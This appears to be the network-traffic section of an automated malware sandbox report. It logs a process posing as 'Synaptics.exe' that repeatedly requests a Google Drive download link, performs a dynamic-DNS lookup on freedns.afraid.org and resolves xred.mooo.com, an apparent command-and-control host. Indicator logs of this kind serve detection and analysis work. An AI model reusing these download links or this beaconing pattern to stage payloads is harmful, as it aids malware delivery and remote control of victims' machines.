                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                          Source: global trafficHTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache
                          Source: global trafficDNS traffic detected: DNS query: docs.google.com
                          Source: global trafficDNS traffic detected: DNS query: xred.mooo.com
                          Source: global trafficDNS traffic detected: DNS query: freedns.afraid.org
                          Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4hScLdnGCuYWqVYuk5Mf1tbrmYb90l-I7PFbRASJwmx8IGzxOKeq15URZwelwNMBtnR3CJgfMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 24 Dec 2024 21:11:13 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-8BJ9zOTNVeEpSCIbFV21XA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=OM-dp6bhkhtg79xklAD4xIA-z7FHNk5sgiYtwe9uQU4WfMFr402V9JwNDcq_k6qFgzr7UHEiUo4sL27axlfLKU20pwx-trh7K4VC0SV1oqLt7LhN0lgJgXY86j07HEtnK1kbCobYTpp6nJAQW0XvlryROAv_MUj0QkOxSMMfa_aW60phebG1418L; expires=Wed, 25-Jun-2025 21:11:13 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC557Hv_HOLpf4KjtxE7VNh1ywnGJfmVys6STkpqu9Iz2nxNsMK6VCVvjEHzblZJkL5GContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 24 Dec 2024 21:11:13 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-BAq6LDjmjgpTjI_xCI-wpw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerSet-Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR; expires=Wed, 25-Jun-2025 21:11:13 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5fat0U7k49mXI09JjxSeGDj28OoeTy5ZJqKq6K8Cs4rhLBUfQJxLBwlCeMsB5JWtL6Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 24 Dec 2024 21:11:19 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-h4r8OeM-7gi2UGyRRhujBw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4Qa4NNLCGpAS_DrTVSpo2ryrYMrKabG7-1bYNIjt0pbA_LW6IyDFaQZixp_3fIAQIQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 24 Dec 2024 21:11:20 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-Daw1Ks3d3Gbpg5phCXiQCQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4-zQ8CE_aZEzsR8NJ7xj1XwihvuRYoswtbwgvUOLG9sYBAFObal_K9U0nrye83IiaxContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 24 Dec 2024 21:11:29 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-vU70lNuHQHCX6pe4HILN1w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7yNNFA905L8ELR7XnDMInO6kv1kts9PYnMKUZmMbQxZzEyqWHDn-mdqs3Ulnh3vsl3MjIgC_8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 24 Dec 2024 21:11:29 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-U6geAeSX1Qtc8dYY0KrEKg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7rnA9_S7Qi8GCA-UfTGrN2qot5VI59vv9DVVz-6ifeqn1KLxJhijsbMUdSyxLEDlh-s-OSi1YContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 24 Dec 2024 21:11:36 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-8KwHAnbsuHNwIumLCnEOIw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4pKyjdqt4DzAwuz2ckpNDPo_jMB6XfH4kT_PMUHhNVAQ9LIe-hbRn0uGNs2rwUVeefHDMRBaEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 24 Dec 2024 21:11:36 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-tZihVc4qzydeDx-Gv_6Xbg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7WA2Y8YS4sq2SX7PKcmRLUFFUwmOfe-iVK2TqvHNzPYGCEVdCfiNZEhdaIlmmmOwqoMp9PPFUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 24 Dec 2024 21:11:41 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-H0xkIP8YlI84o1Uzra5R1w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5ZRiUz5NVF2mP0u_ZVsZDEBOnXQC28AKyFRCynzL__a8CMZvu9nhsbEgCFBgc84JFIw5w_XAoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 24 Dec 2024 21:11:42 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-vjgl7Th5SEbiqZaYJKFzYQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC63DFsQz3sKHX5p44TO5CCb6KTyATAYZCq-VPMxjK-HiRJHwdl2dK97caE0JW5nk7c7twd5KXMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 24 Dec 2024 21:11:47 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-uCmGXL5lZlXSeD9fBE_H1g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4tM4RNzm6pgjsCYwEWZyaTyQe_Pe6fNwaZ0Prrv-U2MD-A4qEbt19VF1hvTHkOKe8SContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 24 Dec 2024 21:11:48 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-q8nhPTFmtj4YD-IYRr_0Fg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC652bycUPoO2we3pLJ8LVCX_m5I7oRWsYNQfOKYI50ehht8hjhmOmhl8N9VeLHHnZofContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 24 Dec 2024 21:11:50 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-kHapn9SFc31QkqRiSGpa4Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4qrH-xw_kKokj_JvYjz4tY4wPvpIDZw-PBp_7e8RFOMgM1Y0A-Ovlong2yKWKWkmxhO30K8XoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 24 Dec 2024 21:12:01 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-DNAx6Nbu9OaUo_wjJxelhw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
